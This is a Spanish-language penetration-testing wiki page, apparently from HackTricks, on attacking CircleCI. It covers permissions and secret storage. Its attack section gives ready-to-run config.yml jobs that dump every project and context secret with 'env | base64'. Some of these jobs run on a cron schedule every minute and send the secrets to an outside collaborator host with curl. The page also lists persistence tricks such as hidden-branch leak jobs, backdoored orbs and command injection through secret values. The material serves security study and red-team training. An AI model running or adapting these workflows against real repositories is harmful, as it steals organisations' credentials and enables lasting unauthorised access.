8.7 KiB
Seguridad de CircleCI
{{#include ../banners/hacktricks-training.md}}
Información Básica
CircleCI es una plataforma de Integración Continua donde puedes definir plantillas indicando lo que quieres que haga con algún código y cuándo hacerlo. De esta manera, puedes automatizar pruebas o despliegues directamente desde la rama maestra de tu repositorio, por ejemplo.
Permisos
CircleCI hereda los permisos de github y bitbucket relacionados con la cuenta que inicia sesión.
En mis pruebas verifiqué que mientras tengas permisos de escritura sobre el repositorio en github, podrás gestionar la configuración del proyecto en CircleCI (configurar nuevas claves ssh, obtener claves api del proyecto, crear nuevas ramas con nuevas configuraciones de CircleCI...).
Sin embargo, necesitas ser un administrador del repositorio para convertir el repositorio en un proyecto de CircleCI.
Variables de Entorno y Secretos
Según la documentación hay diferentes maneras de cargar valores en variables de entorno dentro de un flujo de trabajo.
Variables de entorno integradas
Cada contenedor ejecutado por CircleCI siempre tendrá variables de entorno específicas definidas en la documentación como CIRCLE_PR_USERNAME, CIRCLE_PROJECT_REPONAME o CIRCLE_USERNAME.
Texto claro
Puedes declararlas en texto claro dentro de un comando:
- run:
name: "set and echo"
command: |
SECRET="A secret"
echo $SECRET
Puedes declararlos en texto claro dentro del entorno de ejecución:
- run:
name: "set and echo"
command: echo $SECRET
environment:
SECRET: A secret
Puedes declararlos en texto claro dentro del entorno del trabajo de construcción:
jobs:
build-job:
docker:
- image: cimg/base:2020.01
environment:
SECRET: A secret
Puedes declararlos en texto claro dentro del entorno de un contenedor:
jobs:
build-job:
docker:
- image: cimg/base:2020.01
environment:
SECRET: A secret
Secretos del Proyecto
Estos son secretos que solo van a ser accesibles por el proyecto (por cualquier rama).
Puedes verlos declarados en https://app.circleci.com/settings/project/github/<org_name>/<repo_name>/environment-variables
.png)
Caution
La funcionalidad de "Importar Variables" permite importar variables de otros proyectos a este.
Secretos de Contexto
Estos son secretos que son a nivel de organización. Por defecto, cualquier repo podrá acceder a cualquier secreto almacenado aquí:
.png)
Tip
Sin embargo, ten en cuenta que se puede seleccionar un grupo diferente (en lugar de Todos los miembros) para dar acceso a los secretos solo a personas específicas.
Esta es actualmente una de las mejores maneras de aumentar la seguridad de los secretos, para no permitir que todos accedan a ellos, sino solo algunas personas.
Ataques
Buscar Secretos en Texto Claro
Si tienes acceso al VCS (como github), revisa el archivo .circleci/config.yml de cada repo en cada rama y busca posibles secretos en texto claro almacenados allí.
Enumeración de Variables de Entorno Secretas y Contexto
Revisando el código puedes encontrar todos los nombres de los secretos que están siendo utilizados en cada archivo .circleci/config.yml. También puedes obtener los nombres de contexto de esos archivos o revisarlos en la consola web: https://app.circleci.com/settings/organization/github/<org_name>/contexts.
Exfiltrar Secretos del Proyecto
Warning
Para exfiltrar TODOS los SECRETOS del proyecto y del contexto, solo necesitas tener acceso de ESCRITURA a solo 1 repo en toda la organización de github (y tu cuenta debe tener acceso a los contextos, pero por defecto todos pueden acceder a cada contexto).
Caution
La funcionalidad de "Importar Variables" permite importar variables de otros proyectos a este. Por lo tanto, un atacante podría importar todas las variables del proyecto de todos los repos y luego exfiltrar todas juntas.
Todos los secretos del proyecto siempre se establecen en el entorno de los trabajos, por lo que solo llamar a env y ofuscarlo en base64 exfiltrará los secretos en la consola de registro web de los flujos de trabajo:
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "env | base64"
workflows:
exfil-env-workflow:
jobs:
- exfil-env
Si no tienes acceso a la consola web pero tienes acceso al repositorio y sabes que se utiliza CircleCI, puedes crear un flujo de trabajo que se dispare cada minuto y que exfiltre los secretos a una dirección externa:
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
workflows:
exfil-env-workflow:
triggers:
- schedule:
cron: "* * * * *"
filters:
branches:
only:
- circleci-project-setup
jobs:
- exfil-env
Exfiltrar secretos de contexto
Necesitas especificar el nombre del contexto (esto también exfiltrará los secretos del proyecto):
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "env | base64"
workflows:
exfil-env-workflow:
jobs:
- exfil-env:
context: Test-Context
Si no tienes acceso a la consola web pero tienes acceso al repositorio y sabes que se utiliza CircleCI, puedes simplemente modificar un flujo de trabajo que se activa cada minuto y que exfiltra los secretos a una dirección externa:
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
workflows:
exfil-env-workflow:
triggers:
- schedule:
cron: "* * * * *"
filters:
branches:
only:
- circleci-project-setup
jobs:
- exfil-env:
context: Test-Context
Warning
Simplemente crear un nuevo
.circleci/config.ymlen un repositorio no es suficiente para activar una construcción de circleci. Necesitas habilitarlo como un proyecto en la consola de circleci.
Escape to Cloud
CircleCI te da la opción de ejecutar tus construcciones en sus máquinas o en las tuyas.
Por defecto, sus máquinas están ubicadas en GCP, y al principio no podrás encontrar nada relevante. Sin embargo, si una víctima está ejecutando las tareas en sus propias máquinas (potencialmente, en un entorno en la nube), podrías encontrar un punto final de metadatos en la nube con información interesante.
Ten en cuenta que en los ejemplos anteriores se lanzó todo dentro de un contenedor de docker, pero también puedes pedir que se lance una máquina VM (que puede tener diferentes permisos en la nube):
jobs:
exfil-env:
#docker:
# - image: cimg/base:stable
machine:
image: ubuntu-2004:current
O incluso un contenedor de docker con acceso a un servicio de docker remoto:
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- setup_remote_docker:
version: 19.03.13
Persistencia
- Es posible crear tokens de usuario en CircleCI para acceder a los endpoints de la API con el acceso de los usuarios.
- https://app.circleci.com/settings/user/tokens
- Es posible crear tokens de proyectos para acceder al proyecto con los permisos otorgados al token.
- https://app.circleci.com/settings/project/github/<org>/<repo>/api
- Es posible agregar claves SSH a los proyectos.
- https://app.circleci.com/settings/project/github/<org>/<repo>/ssh
- Es posible crear un trabajo cron en una rama oculta en un proyecto inesperado que está filtrando todas las variables de contexto env todos los días.
- O incluso crear en una rama / modificar un trabajo conocido que filtrará todo el contexto y los secretos de los proyectos todos los días.
- Si eres un propietario de github, puedes permitir orbs no verificados y configurar uno en un trabajo como puerta trasera.
- Puedes encontrar una vulnerabilidad de inyección de comandos en alguna tarea e inyectar comandos a través de un secreto modificando su valor.
{{#include ../banners/hacktricks-training.md}}